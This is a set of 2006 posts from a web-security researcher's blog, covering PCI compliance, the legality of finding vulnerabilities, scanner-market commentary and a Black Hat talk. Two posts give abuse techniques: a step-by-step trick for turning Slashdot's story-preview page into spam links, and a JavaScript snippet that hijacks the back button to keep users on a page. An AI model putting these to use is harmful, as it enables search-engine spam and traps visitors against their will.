Bob Auger from cgisecurity.com helped me test in Internet Explorer 6. The browser just sat there trying to load. Not so smart.

Hey I can see my, office!

I know it's old to most people, yet coolness factor of Google Earth never fails to impress me. If you said that this level of information access would be in the hands of anyone with a PC in the 90's, well you'd either be raising VC cash or called crazy (maybe both). Plus, I live and work in Silicon Valley (southern half of the northern California bay area), where a lot of the cutting-edge technology is developed. Having grown up in Maui and now being in the center of it all also amazes me. Driving to lunch, market, work, gym, etc. and your likely to see the headquarters of the world's tech-giants. No matter where you go you overhear people taking techno-babble. If your a techno-nerd, this is the place to be.

Still, the question I often get is why I moved. Other than this is where I need to be to run WhiteHat, I don't have a solid answer. Though I do take my vacations on Maui. :)

WhiteHat Security Headquarters


Cool technology companies within 15min of each other

Netcraft Survery Says! 96,854,877 sites

That's about 1 site for every 3 people in the United States.

September 2006 Web Server Survey
"Growth is being driven by two trends: the popularity of blogging services, and the heated battle between Microsoft and Google for new users for their web platforms. Huge growth continues at Windows Live Spaces, Microsoft's free blogging/networking service,"

I'll bet you a 0-day that most of these are splogs.

How do you go about securing millions of websites? There is no silver-bullet solution to look forward to. We'll have to use everything in the arsenal. (security in the SDLC, security assessments, web application firewalls, source code audits, secure configuration, catchas, browser toolbars, etc. )


Questions loom over PCI compliance

A timely article by SearchAppSecurity, Expected PCI standard update raises concerns for Web app security, digs into the webappsec PCI standard mystery. The question is are the powers that be going to gut the PCI standard? According to communication received by certified PCI scanning vendors, there is supposed to be a drop of 8 of the OWASP Top 10. Leaving only Cross-Site Scripting (XSS) and SQL Injection. Then almost contradictory, a MasterCard spokesperson said: "...there are no plans to make any of the PCI Data Security Standard requirements less robust. Any future enhancements to the standard are intended to foster broad compliance without compromising the underlying security requirements of the current standard." As always the answer to 99 questions out of 100 is money.

For those unfamiliar, the Payment Card Industry Data Security Standard (PCI DSS) is a mandate from Visa, MasterCard, AMEX, Discover, and JCB dictate how merchants (handling over 20K CC transactions per year) must protect the data. Merchants must also have their publicly facing networks and websites scanned for vulnerabilities every 3 months by a certified scanning vendor (WhiteHat Security is on the list). Network scanning is fairly common and reasonably inexpensive. For anything less than a class-C network, it'll normally cost only several thousand dollars since the process is highly commoditized and supremely automated. To contrast, web application security assessments typically run anywhere from 8K to 20K per website. Web application security assessments take quite a bit of technical expertise and the process is comparably manual (including scanning for XSS and SQL Injection). While continuous services like WhiteHat Sentinel are pushing costs down and quality up, pricing is still going to be off from that of network layer scanning.

The credit card brands would love to enforcement really strong standards. The key factor is customer adoption. Many, perhaps most, of the larger merchants are already moving towards a continuous and comprehensive webappsec program regardless of PCI. However, smaller and mid-sized merchants may revolt if the jump in cost of doing business to comply is too great. The PCI DSS committee's challenge is a finding the proper balance between security and afforable pricing. They're asking themselve's, "What if we say only scan for the suff that can be automated? 1) Will that be cheap enough? 2) Will that make a difference in website security"?

1) Possibly
Too much cost is relative to the merchant and the number of websites they happen to have. Obviously paying nothing is more desirable to paying anything. It's the responsiblity of the scanning vendors and the market opportunity to drive cost-effective solutions. (Bias warning: I think WhiteHat Sentinel is that solution)

2) Definitely not.
I'll keey saying it. It only takes a single vulnerability to seriously impact an online business. The bad guys know that. Unless your prepared to find all the vulnerabilities all the time (the goal), what you are not getting is security.

Monday, September 04, 2006

How to get linked from Slashdot

A 5 step process, making use of Slashdot's PreviewStory feature, to create URL's that link anywhere and say anything.

1) Go to Slashdot's story submissions page and fill out the form.
* Include links and text pointing back to your website. (Shorter is better)

2) Convert the form action from "POST" to "GET".
* I use Web Developer extension for Firefox. (See screenshot)

3) Click "PreviewStory".

4) Copy the Preview Page URL.
* Should look something like...
http://slashdot.org/submit.pl?reskey=drB7oIuT5zrHsfhHtr7S&name=He+who&email=&
subj=How+to+get+linked+from+Slashdot&primaryskid=0&tid=133&story=Shiny+new+
Slashdot+link+to+my+blog%2C+%3Ca+href%3D%22http%3A%2F%2Fjeremiahgrossman.
blogspot.com%2F%22%3EJeremiah+Grossman%3C%2Fa%3E.

Snipping off "op=PreviewStory" makes the link last longer. If you want to shorten the URL snip off "&sub_type=html", maybe "primaryskid=0&tid=133", or use TinyURL.

5) Link to the Preview Page URL from some other webpage .
* Wait for the search engine crawlers. (Slashdot is now linking to you)


Voila.


Preview Page Screenshot:



Some answered questions

a) Will I get Slashdot'ed by using this?
No. You're unlikely to get visitor traffic from this type of link.

b) Does Google, Yahoo, MSN index the Preview Page URL?
Yes.

c) Is Slashcode the only software open to this?
No. The same technique also works on many blogs, message boards, guestbooks, and comment systems. Just look for the preview feature.

d) Are the Black Hat SEO's using this?
Of course. In fact its possible to automated the discovery of websites using Slashcode and generate the Preview Page URL's dynamically.

Sunday, September 03, 2006

Vulnerability "discovery" more important than disclosure

The vulnerability "disclosure" debate isn't going away. A post at StillSecure, After All These Years has some nice links to experts boiling down their respective arguments attempting to balance researcher ethics, user security, and vendor responsibility. My question is, “what happens to our security when researchers lose the legal ability discover vulnerabilities in the software that's the most important (custom web applications)"?

By their nature, custom web applications are hosted on someone else's servers and available nowhere else. Attempting to find vulnerabilities of any kind on machines other than your own is frowned upon as being potentially illegal. Who cares about disclosure when we can’t even go about finding security issues without running the risk of going to jail. Some say, "do not test a system without written consent", offer good, but also short-sighted advice. The InfoSec community hasn't dealt with the legal issues of "discovering" vulnerabilities, only with "disclosing" them.

Traditionally researchers have played the role of Good Samaritan by finding vulnerabilities in software readily available to them. We're rapidly moving towards a world where the software that holds our most sensitive information (online banks, stores, IRS, etc.) is not on PC desktop software. The same people whom provide the layer of community oversight run into a very real problem besides ethics, a threat to their personal freedom. I’d wager there are few top researchers are willing to risk incarceration in pursuit of a few Cross-Site Scripting and SQL Injection issues. Organizations providing the web-based services are also not going to be handing out hack-me-if-can authorization letters. And with few people looking, software security naturally degrades. That's probably why 8 out of 10 websites have vulnerabilities.

Saturday, September 02, 2006

Intercept the web browser back button

While working on a (yet-to-released) JavaScript hack, I needed a method to intercept the browser back button for preventing users from leaving a web page, and hence the thread of control. AJAX programmers also need to support the back button when moving through sessions states on the same page. From what I can tell, the "normal" way to do this is by users link anchors. I wanted something simpler and more forceful. Here's a technique I found using Firefox (1.5.0.6).

var body = document.getElementsByTagName('body');
body[0].setAttribute("onunload", "backButtonDestroyer()");

function backButtonDestroyer() {
window.stop();
window.location = 'http://jeremiahgrossman.blogspot.com/';
}

Note: If someone has previously published technique (I couldn't find it), let me know and I'll link to you. Thanks.



Friday, September 01, 2006

Where the Web Application Security Market is Heading

A recent article from SD Times, Slipping In The Side Door With App Security Message, describes how web application security scanner (SPI Dynamics, Fortify, Watchfire, Secure Software, etc.) vendors approach the market and where they believe things are heading. While I agree with these guys on many issues, I disagree with most of their conclusions and predictions cited within. Before firing away let's make it totally clear that I am 100% biased when it comes to web application vulnerability assessment solutions. If my ideas make sense to you, great, if not, that's OK, you've seen the opposite view.

Article Main Points:

Customer’s who don't buy, don't get it.
(Wrong)

Today's customers DO get it and those who don't WANT TO. Black Hat's record web application security presence and the thousands of attendees filling the speeches are one testament to that. Informative articles, books, reports, tutorials, technical conversations, and hacks are published daily educating the customer. However, customer education comes with increased expectations of vendors. Smoke and mirrors sales tactics are unimpressive to the well informed. And if a customer didn't buy, it doesn’t mean they don't take web application security seriously. It probably means the solution wasn't what they needed. Or wanted.

Developers don’t see security as part of their role.
(Yes they do)
A developer’s responsibility is converting design specifications into a software implementation. Asking developers to use additional tools that interfere with the programming process will never be mainstream. That premise is in direct conflict with a their role and interests of the business. Developer’s want security baked into the programming languages and software libraries they use. Think Java. Think dotNET. What they WANT is code that’s secure from the beginning, scanning or no scanning. If you have a product that speeds code creation that also happens to be secure, then you have something of real value. Interests are in alignment.

White-Box / Black-Box combo is greater than the sum of its parts.
(Maybe)
I've talked about it before; White or black box scanning is only capable of testing for about half of the potential vulnerabilities. Mostly technical vulnerabilities like Cross-site Scripting and SQL Injection, and not even those all of the time. The contextual business logic issues remain ignored. Combining two incomplete solutions will not add up to something comprehensive. Besides, these tools largely overlap in what they find anyway. But I want to be fair, this type of tight product integration is new, so I guess we’ll wait and see what how the performance turns out.

The market is heading towards more tools.
(That's where some vendors are heading, not the market.)
Customers want solutions that find all the vulnerabilities all the time (the goal) before and after software release. Tools aren’t going to accomplish that. We know it only takes a single vulnerability to seriously impact an online business. And just as its happening(-ed) in the network VA space, the web application security vulnerability assessment market will be dominated by service providers. Customers and service providers figured out that finding vulnerabilities is just one small piece of the puzzle. It takes a lot of infrastructure to continuously assess dozens/hundreds/thousands of websites, manage the vulnerability remediation process, and fulfill compliance obligations with third-party validation.

Video - Hacking Intranet Websites from the Outside

We posted the video to our much acclaimed Black Hat talk we presented, Hacking Intranet Websites from the Outside (MPEG-4) "JavaScript malware just got a lot more dangerous". Slides and proof-of-concept code is available for those interested. Thanks again to RSnake for helping us out and to everyone with hung out with that made the trip a blast.